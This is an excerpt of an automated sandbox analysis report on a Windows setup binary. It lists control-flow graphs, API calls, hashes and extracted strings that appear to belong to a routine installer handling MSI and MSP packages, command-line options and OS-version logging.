                                                              control_flow_graph 1223 6c932582-6c9325bb call 6c976e1a call 6c918996 call 6c9485bc 1230 6c932635-6c932645 call 6c9485bc 1223->1230 1231 6c9325bd-6c9325d1 call 6c96c0aa 1223->1231 1236 6c932647-6c93265b call 6c96c0aa 1230->1236 1237 6c932688-6c932698 call 6c9485bc 1230->1237 1238 6c9325d3-6c9325fd call 6c94833e 1231->1238 1239 6c93260f 1231->1239 1249 6c932661-6c932671 1236->1249 1250 6c9328bd 1236->1250 1254 6c9326da-6c9326ea call 6c9485bc 1237->1254 1255 6c93269a-6c9326ae call 6c96c0aa 1237->1255 1251 6c932605-6c932608 call 6c92a82c 1238->1251 1252 6c9325ff-6c932601 1238->1252 1240 6c932611-6c93261f 1239->1240 1244 6c9328c6-6c9328f1 call 6c94833e call 6c9768b5 1240->1244 1245 6c932625-6c932630 call 6c968f0e 1240->1245 1275 6c9328f3-6c932936 call 6c926cb7 call 6c968eab call 6c9484b9 call 6c968f0e * 2 1244->1275 1276 6c932938-6c93297b call 6c948cd5 call 6c948c7a call 6c948c24 1244->1276 1245->1244 1257 6c932673-6c932675 1249->1257 1258 6c932679-6c932683 call 6c92f05d 1249->1258 1263 6c9328bf-6c9328c3 1250->1263 1266 6c93260d 1251->1266 1252->1251 1272 6c93272b-6c93273b call 6c9485bc 1254->1272 1273 6c9326ec-6c932700 call 6c96c0aa 1254->1273 1255->1250 1274 6c9326b4-6c9326c5 1255->1274 1257->1258 1258->1263 1263->1244 1266->1240 1287 6c93277d-6c93278d call 6c9485bc 1272->1287 1288 6c93273d-6c932751 call 6c96c0aa 1272->1288 1273->1250 1290 6c932706-6c932716 1273->1290 1278 6c9326c7-6c9326c9 1274->1278 1279 6c9326cd-6c9326d5 call 6c92b69b 1274->1279 1275->1276 1320 6c932980-6c9329c0 call 6c968f0e * 5 1276->1320 1278->1279 1279->1263 1307 6c9327d0-6c9327e0 call 6c9485bc 1287->1307 1308 6c93278f-6c9327a3 call 6c96c0aa 1287->1308 1288->1250 1304 6c932757-6c932768 1288->1304 1294 6c932718-6c93271a 1290->1294 1295 6c93271e-6c932721 call 6c92d8a6 1290->1295 1294->1295 1306 6c932726 1295->1306 1310 6c932770-6c932778 call 6c92c922 1304->1310 1311 6c93276a-6c93276c 1304->1311 1306->1263 1323 6c932823-6c932833 call 6c9485bc 1307->1323 1324 6c9327e2-6c9327f6 call 6c96c0aa 1307->1324 1308->1250 1319 6c9327a9-6c9327b9 1308->1319 1310->1263 1311->1310 1325 6c9327c1-6c9327cb call 6c92e30e 1319->1325 1326 6c9327bb-6c9327bd 1319->1326 1373 6c9329c2-6c9329c4 1320->1373 1374 6c9329c8-6c9329d0 call 6c976f06 1320->1374 1337 6c932835-6c932849 call 6c96c0aa 1323->1337 1338 6c93286e-6c93287e call 6c9485bc 1323->1338 1324->1250 1340 6c9327fc-6c93280c 1324->1340 1325->1263 1326->1325 1337->1250 1353 6c93284b-6c93285c 1337->1353 1351 6c9329d3-6c932ad5 call 6c948cd5 call 6c948c7a call 6c968f0e * 2 call 6c94833e call 6c948cd5 call 6c91838a call 6c968f0e * 2 call 6c918415 call 6c968f0e call 6c91a378 call 6c9714aa call 6c92632c 1338->1351 1352 6c932884-6c932898 call 6c96c0aa 1338->1352 1343 6c932814-6c93281e call 6c92facf 1340->1343 1344 6c93280e-6c932810 1340->1344 1343->1263 1344->1343 1404 6c932ad7-6c932add call 6c96b081 1351->1404 1405 6c932ade-6c932ae2 1351->1405 1352->1250 1364 6c93289a-6c9328ab 1352->1364 1357 6c932864-6c93286c call 6c9302c6 1353->1357 1358 6c93285e-6c932860 1353->1358 1357->1263 1358->1357 1368 6c9328b3-6c9328bb call 6c931287 1364->1368 1369 6c9328ad-6c9328af 1364->1369 1368->1263 1369->1368 1373->1374 1404->1405
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C932589
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • __CxxThrowException@8.LIBCMT ref: 6C932AB0
                                                                • Part of subcall function 6C96C0AA: std::exception::exception.LIBCMT ref: 6C96C0F9
                                                                • Part of subcall function 6C96C0AA: std::exception::exception.LIBCMT ref: 6C96C113
                                                                • Part of subcall function 6C96C0AA: __CxxThrowException@8.LIBCMT ref: 6C96C124
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throwstd::exception::exception$_malloc
                                                              • String ID: ", local path $". Valid types are MSI, MSP, Exe, Patches, ServiceControl and File. Theses are case sensitive.$(not applicable)$Adding Item type "$AgileMSI$CleanupBlock$Exe$File$MSI$MSP$ParameterInfo.xml$Patches$RelatedProducts$ServiceControl$Unknown Item type "$schema validation failure: unknown Item type -
                                                              • API String ID: 3439882596-1328758535
                                                              • Opcode ID: ed22f2608e8be473e1aa2a94d443d54adc919e25acc978388ea31001176d059c
                                                              • Instruction ID: e780737fc14b1e92c26e252e4aecd29801f2fe00a3645b2c63d8cb93dd798c67
                                                              • Opcode Fuzzy Hash: ed22f2608e8be473e1aa2a94d443d54adc919e25acc978388ea31001176d059c
                                                              • Instruction Fuzzy Hash: 4B02A271905618EFDF04DBE8C944AED7BF8AF29318F10455AF419E7B85CB30DA088BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C48BE03 Relevance: 31.7, APIs: 1, Strings: 17, Instructions: 220COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C48BE0A
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C49F35E: __EH_prolog3.LIBCMT ref: 6C49F365
                                                                • Part of subcall function 6C49F35E: __recalloc.LIBCMT ref: 6C49F3A7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$__recalloc
                                                              • String ID: CEIPconsent$NoSetupVersionCheck$chainingpackage$createlayout$lcid$log$msioptions$norestart$parameterfolder$passive$pipe$promptrestart$repair$serialdownload$showfinalerror$uninstall$uninstallpatch
                                                              • API String ID: 1900422986-634121796
                                                              • Opcode ID: 01a773d90959effd4bf181e75f3aa6db94566fa14e55c361f2361abac2ddf48e
                                                              • Instruction ID: 773c6ceae71cc3bbb8abadaf76c505962a293e6ff01eccb4e8773c354f724658
                                                              • Opcode Fuzzy Hash: 01a773d90959effd4bf181e75f3aa6db94566fa14e55c361f2361abac2ddf48e
                                                              • Instruction Fuzzy Hash: 36A12EB18011AD9EEB10D7E8C884FEDBBB4AF1531CF18059CE024A3785D775A64D9BB2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C913E77 Relevance: 31.7, APIs: 1, Strings: 17, Instructions: 219COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C949067: __EH_prolog3.LIBCMT ref: 6C94906E
                                                                • Part of subcall function 6C949067: __recalloc.LIBCMT ref: 6C9490B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$__recalloc
                                                              • String ID: CEIPconsent$NoSetupVersionCheck$chainingpackage$createlayout$lcid$log$msioptions$norestart$parameterfolder$passive$pipe$promptrestart$repair$serialdownload$showfinalerror$uninstall$uninstallpatch
                                                              • API String ID: 1900422986-634121796
                                                              • Opcode ID: 47b4e783487af36b9a71cffe86ce2044a380737a482de4b59f9216fbf665270d
                                                              • Instruction ID: ae2a90210aae0625c35df758456201c6df667df2cbf2d875a795894df2f3aee3
                                                              • Opcode Fuzzy Hash: 47b4e783487af36b9a71cffe86ce2044a380737a482de4b59f9216fbf665270d
                                                              • Instruction Fuzzy Hash: E191E63140428CEADB04DBB8CA44BCC77A9AF31368F54C646E8249BF81C775DB1C9766
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C92148D Relevance: 30.3, APIs: 3, Strings: 14, Instructions: 510COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1641 6c92148d-6c921502 call 6c91ac58 call 6c9485bc 1647 6c921508-6c92151d call 6c96c0aa 1641->1647 1648 6c92158e-6c9215a1 call 6c9485bc 1641->1648 1653 6c921554 1647->1653 1654 6c92151f-6c92153b call 6c94833e call 6c920e96 1647->1654 1655 6c9215a3-6c9215b8 call 6c96c0aa 1648->1655 1656 6c92160b-6c92161c call 6c9485bc 1648->1656 1660 6c921556-6c921561 1653->1660 1675 6c921540-6c921552 call 6c968f0e 1654->1675 1670 6c9215ba-6c9215d6 call 6c94833e call 6c920e96 1655->1670 1671 6c9215ef 1655->1671 1668 6c921661-6c921674 call 6c9485bc 1656->1668 1669 6c92161e-6c921631 call 6c96c0aa 1656->1669 1664 6c921563-6c921565 1660->1664 1665 6c921569 1660->1665 1664->1665 1666 6c92156b-6c92158b call 6c968f0e 1665->1666 1685 6c921676-6c92168b call 6c96c0aa 1668->1685 1686 6c9216c9-6c9216dc call 6c9485bc 1668->1686 1688 6c921643 1669->1688 1689 6c921633-6c92163a call 6c9211f6 1669->1689 1695 6c9215db-6c9215ed call 6c968f0e 1670->1695 1673 6c9215f1-6c9215fc 1671->1673 1679 6c921604-6c921606 1673->1679 1680 6c9215fe-6c921600 1673->1680 1675->1660 1679->1666 1680->1679 1685->1671 1704 6c921691-6c9216c4 call 6c94833e call 6c9200a7 call 6c968f0e 1685->1704 1702 6c921731-6c921744 call 6c9485bc 1686->1702 1703 6c9216de-6c9216f3 call 6c96c0aa 1686->1703 1691 6c921645-6c921650 1688->1691 1699 6c92163f-6c921641 1689->1699 1691->1666 1696 6c921656-6c92165c 1691->1696 1695->1673 1696->1666 1699->1691 1712 6c921746-6c92175b call 6c96c0aa 1702->1712 1713 6c921799-6c9217ac call 6c9485bc 1702->1713 1703->1671 1714 6c9216f9-6c92172c call 6c94833e call 6c9200a7 call 6c968f0e 1703->1714 1704->1673 1712->1671 1725 6c921761-6c921794 call 6c94833e call 6c9200a7 call 6c968f0e 1712->1725 1727 6c921801-6c921814 call 6c9485bc 1713->1727 1728 6c9217ae-6c9217c3 call 6c96c0aa 1713->1728 1714->1673 1725->1673 1739 6c921816-6c92182b call 6c96c0aa 1727->1739 1740 6c921869-6c92187a call 6c9485bc 1727->1740 1728->1671 1737 6c9217c9-6c9217fc call 6c94833e call 6c9200a7 call 6c968f0e 1728->1737 1737->1673 1739->1671 1754 6c921831-6c921864 call 6c94833e call 6c9200a7 call 6c968f0e 1739->1754 1751 6c9218a6-6c9218b7 call 6c9485bc 1740->1751 1752 6c92187c-6c92187e call 6c96c0aa 1740->1752 1764 6c9218d7-6c9218e8 call 6c9485bc 1751->1764 1765 6c9218b9-6c9218c3 call 6c96c0aa 1751->1765 1762 6c921883-6c92188f 1752->1762 1754->1673 1762->1688 1767 6c921895-6c9218a1 call 6c920baa 1762->1767 1778 6c921902-6c9219d7 call 6c94833e call 6c948cd5 call 6c91838a call 6c968f0e * 2 call 6c918415 call 6c968f0e call 6c91a378 call 6c9714aa call 6c976e1a call 6c918b9f call 6c92148d 1764->1778 1779 6c9218ea-6c9218f4 call 6c96c0aa 1764->1779 1765->1688 1777 6c9218c9 1765->1777 1767->1751 1781 6c9218cf 1777->1781 1809 6c9219dc-6c9219e8 1778->1809 1779->1688 1786 6c9218fa-6c921900 1779->1786 1781->1764 1786->1781 1810 6c9219f0-6c921a19 call 6c968eab 1809->1810 1811 6c9219ea-6c9219ec 1809->1811 1814 6c921a21-6c921a29 call 6c91922c 1810->1814 1815 6c921a1b-6c921a1d 1810->1815 1811->1810 1818 6c921ae3-6c921aea call 6c976f06 1814->1818 1819 6c921a2f-6c921ade call 6c94833e call 6c948cd5 call 6c948c7a call 6c91838a call 6c968f0e * 3 call 6c918415 call 6c968f0e call 6c91a378 call 6c9714aa 1814->1819 1815->1814 1819->1818
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8FreeStringThrow_malloc
                                                              • String ID: can only have one logical or arithmietic expression for a child node$AlwaysTrue$And$Equals$Exists$GreaterThan$GreaterThanOrEqualTo$LessThan$LessThanOrEqualTo$NeverTrue$Not$ParameterInfo.xml$schema validation failure: $schema validation failure: unknown Expression:
                                                              • API String ID: 1924927865-100526994
                                                              • Opcode ID: 097367455a372fdbc5bb2e0720ba37fec1d4836a6d9c3d6ad28112d1cbb52b87
                                                              • Instruction ID: 1d7584feb37a6ec9411aa35e422a536ec5a4381d9ee90c6c7ec05b3d01e977e4
                                                              • Opcode Fuzzy Hash: 097367455a372fdbc5bb2e0720ba37fec1d4836a6d9c3d6ad28112d1cbb52b87
                                                              • Instruction Fuzzy Hash: E102D0711083419FE704CFA8C840B9EB7ECAFA6358F144A5EF495C7B85DB35D9088766
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C496199 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 265COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4961A0
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C491E75: __EH_prolog3.LIBCMT ref: 6C491E7C
                                                                • Part of subcall function 6C491E75: GetThreadLocale.KERNEL32(?,00000004,6C496734,LBqIl,0000004C,6C497142,?,00000000), ref: 6C491E8E
                                                              • PathIsRelativeW.SHLWAPI(?,?,?,0000003C,6C4A7332,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6C4961E9
                                                              • PathFileExistsW.SHLWAPI(?), ref: 6C4961F6
                                                              • PathFileExistsW.SHLWAPI(?,?), ref: 6C49622B
                                                              • PathFileExistsW.SHLWAPI(?), ref: 6C496230
                                                              • CoInitialize.OLE32(00000000), ref: 6C496299
                                                              • CoUninitialize.OLE32(?,?), ref: 6C496340
                                                              • __CxxThrowException@8.LIBCMT ref: 6C4963B7
                                                              • __EH_prolog3.LIBCMT ref: 6C4963C9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Path$ExistsFile$Exception@8InitializeLocaleRelativeThreadThrowUninitialize
                                                              • String ID: ' was not found in UiInfo.xml$String for StringID '$Strings$Strings.xml$Successfuly found file %s $UIInfo.xml
                                                              • API String ID: 1923347782-1246989722
                                                              • Opcode ID: 317611c827b8afc51fde3719d638d84a2d5c61edf2b19096c878f19466aedbbc
                                                              • Instruction ID: 915e0dc4a83f4db1136fe0bd9878e2ae956160ccaf799d029deea67ed6d838d6
                                                              • Opcode Fuzzy Hash: 317611c827b8afc51fde3719d638d84a2d5c61edf2b19096c878f19466aedbbc
                                                              • Instruction Fuzzy Hash: 07A15C71901149EFDB00DBE8C985FDEBBB8AF05318F148159E524EB791DB30DA0ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C950C91 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 247COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1943 6c950c91-6c950cb5 call 6c976e8d GetModuleHandleW 1946 6c950cb7-6c950ce5 call 6c94833e GetLastError call 6c951236 1943->1946 1947 6c950cea-6c950cfb 1943->1947 1956 6c951007-6c951014 call 6c968f0e call 6c976f1f 1946->1956 1952 6c950d03-6c950db0 GetNativeSystemInfo call 6c914e07 call 6c91c5d4 call 6c968f0e call 6c94833e call 6c951236 call 6c968f0e call 6c914fd5 1947->1952 1953 6c950cfd 1947->1953 1975 6c950db2-6c950dba GetLastError 1952->1975 1976 6c950dca 1952->1976 1953->1952 1977 6c950dc6-6c950dc8 1975->1977 1978 6c950dbc-6c950dc1 1975->1978 1979 6c950dcc-6c950e13 call 6c94833e call 6c951236 call 6c968f0e call 6c914fac 1976->1979 1977->1979 1978->1977 1988 6c950e15-6c950e17 1979->1988 1989 6c950e19 1979->1989 1990 6c950e20-6c950e36 1988->1990 1989->1990 1992 6c950e50 1990->1992 1993 6c950e38-6c950e40 GetLastError 1990->1993 1996 6c950e52-6c950e9d call 6c94833e call 6c951236 call 6c968f0e 1992->1996 1994 6c950e42-6c950e47 1993->1994 1995 6c950e4c-6c950e4e 1993->1995 1994->1995 1995->1996 2005 6c950eb7 1996->2005 2006 6c950e9f-6c950ea7 GetLastError 1996->2006 2009 6c950eb9-6c950f5d call 6c94833e call 6c951236 call 6c968f0e call 6c96e770 call 6c914fac call 6c915727 call 6c95356c 2005->2009 2007 6c950eb3-6c950eb5 2006->2007 2008 6c950ea9-6c950eae 2006->2008 2007->2009 2008->2007 2025 6c950f77 2009->2025 2026 6c950f5f-6c950f67 GetLastError 2009->2026 2029 6c950f79-6c950fb4 call 6c94833e call 6c951236 call 6c968f0e call 6c91712b 2025->2029 2027 6c950f73-6c950f75 2026->2027 2028 6c950f69-6c950f6e 2026->2028 2027->2029 2028->2027 2037 6c950fb9-6c951001 call 6c91c5d4 call 6c968f0e call 6c94833e call 6c951236 2029->2037 2037->1956
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C950C9B
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,0000029C,6C94A587,?,6C90A794,?,02642228,?,00000000,?,Failed to record current state name), ref: 6C950CAD
                                                              • GetLastError.KERNEL32(?,Failed to record OSFullBuildNumber), ref: 6C950CCC
                                                                • Part of subcall function 6C951236: __EH_prolog3.LIBCMT ref: 6C95123D
                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 6C950D21
                                                              • GetLastError.KERNEL32(?,00000000,?,Failed to record OSFullBuildNumber,000001C5,00000000), ref: 6C950DB2
                                                              • GetLastError.KERNEL32(?,00000000,?,Failed to record OSAbbr,?,00000000,?,Failed to record OSFullBuildNumber,000001C5,00000000), ref: 6C950E38
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$H_prolog3$H_prolog3_HandleInfoModuleNativeSystem
                                                              • String ID: Failed to record OSAbbr$Failed to record OSComplete$Failed to record OSFullBuildNumber$Failed to record OsSpLevel$Failed to record SystemLocale$Failed to record WindowsInstallerVersion$GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 684166175-3561000745
                                                              • Opcode ID: 07d124d53f5d9bd72feb33a85791c9da8e02ca87e9d9958342f84f34c3eb1c31
                                                              • Instruction ID: a718e8518b29ec978d140b570706906b4ec51d45091404509f5580c0a9d94780
                                                              • Opcode Fuzzy Hash: 07d124d53f5d9bd72feb33a85791c9da8e02ca87e9d9958342f84f34c3eb1c31
                                                              • Instruction Fuzzy Hash: 1DA1C431A00659AFDB20DBB4CD08BD9B7B9AFA530CF1045D4E404E7B80DB74EA99CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49D149 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 114windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C49D150
                                                                • Part of subcall function 6C48C419: __EH_prolog3.LIBCMT ref: 6C48C420
                                                                • Part of subcall function 6C48C419: GetModuleFileNameW.KERNEL32(6C480000,00000010,00000104), ref: 6C48C46D
                                                                • Part of subcall function 6C49F21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,6C48C3AE), ref: 6C49F241
                                                              • LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6C49D198
                                                              • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 6C49D1AF
                                                              • LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6C49D1E4
                                                              • GetDlgItem.USER32(?,00000068), ref: 6C49D1F5
                                                              • SendMessageW.USER32(00000000,00000170,?,00000000), ref: 6C49D209
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6C49D231
                                                              • GetDlgItem.USER32(?,00000069), ref: 6C49D242
                                                              • SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 6C49D256
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6C49D27E
                                                              • GetDlgItem.USER32(?,0000006A), ref: 6C49D28F
                                                              • SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 6C49D2A3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ImageLoadMessageSend$Item$H_prolog3$AppendFileModuleNamePath
                                                              • String ID: graphics\setup.ico$print.ico$save.ico$stop.ico$warn.ico
                                                              • API String ID: 1194837009-3827646805
                                                              • Opcode ID: c2bade2f38b08ec7935ef65a77e8a16ffb001f049268242b9c5a415681574e71
                                                              • Instruction ID: 2e54154ba6fbb2ec4c19917d84c2702bf84b9aa7a2eef35b84496e2660795ad3
                                                              • Opcode Fuzzy Hash: c2bade2f38b08ec7935ef65a77e8a16ffb001f049268242b9c5a415681574e71
                                                              • Instruction Fuzzy Hash: 0D41553074171AAEFF20DBA0CC46FEA7BB9BF05705F000819F265A95D0CBB2E4549B11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9287B0 Relevance: 28.6, APIs: 2, Strings: 14, Instructions: 565COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2082 6c9287b0-6c9287d8 call 6c976e1a 2085 6c9287e0-6c928801 call 6c926249 2082->2085 2086 6c9287da-6c9287dc 2082->2086 2089 6c928803-6c928805 2085->2089 2090 6c928809-6c928826 call 6c9269b7 2085->2090 2086->2085 2089->2090 2093 6c928828-6c92882a 2090->2093 2094 6c92882e-6c928868 call 6c926440 call 6c94833e 2090->2094 2093->2094 2099 6c928870-6c928890 call 6c918d44 call 6c921c2e 2094->2099 2100 6c92886a-6c92886c 2094->2100 2105 6c928892-6c928894 2099->2105 2106 6c928898-6c9288ce call 6c968f0e call 6c94833e 2099->2106 2100->2099 2105->2106 2111 6c9288d0-6c9288d2 2106->2111 2112 6c9288d6-6c9288f6 call 6c918d44 call 6c921d3d 2106->2112 2111->2112 2117 6c9288f8-6c9288fa 2112->2117 2118 6c9288fe-6c928934 call 6c968f0e call 6c94833e 2112->2118 2117->2118 2123 6c928936-6c928938 2118->2123 2124 6c92893c-6c928962 call 6c918d44 call 6c92784c 2118->2124 2123->2124 2129 6c928964-6c928966 2124->2129 2130 6c92896a-6c92899f call 6c968f0e call 6c94833e 2124->2130 2129->2130 2135 6c9289a1-6c9289a3 2130->2135 2136 6c9289a7-6c9289be call 6c919411 call 6c923ba9 2130->2136 2135->2136 2140 6c9289c3-6c9289cc 2136->2140 2141 6c9289d4-6c9289f6 call 6c968f0e 2140->2141 2142 6c9289ce-6c9289d0 2140->2142 2145 6c9289f8-6c9289fa 2141->2145 2146 6c9289fe-6c928a1d call 6c926d1f 2141->2146 2142->2141 2145->2146 2149 6c928a25-6c928a47 call 6c926e28 2146->2149 2150 6c928a1f-6c928a21 2146->2150 2153 6c928a49-6c928a4b 2149->2153 2154 6c928a4f-6c928ad6 call 6c9270c5 call 6c94833e 2149->2154 2150->2149 2153->2154 2159 6c928ad8-6c928ada 2154->2159 2160 6c928ade-6c928b25 call 6c9195c1 call 6c968f0e call 6c94833e 2154->2160 2159->2160 2167 6c928b27-6c928b29 2160->2167 2168 6c928b2d-6c928b74 call 6c9195c1 call 6c968f0e call 6c94833e 2160->2168 2167->2168 2175 6c928b76-6c928b78 2168->2175 2176 6c928b7c-6c928ba9 call 6c9195c1 call 6c968f0e 2168->2176 2175->2176 2181 6c928bb1-6c928be4 call 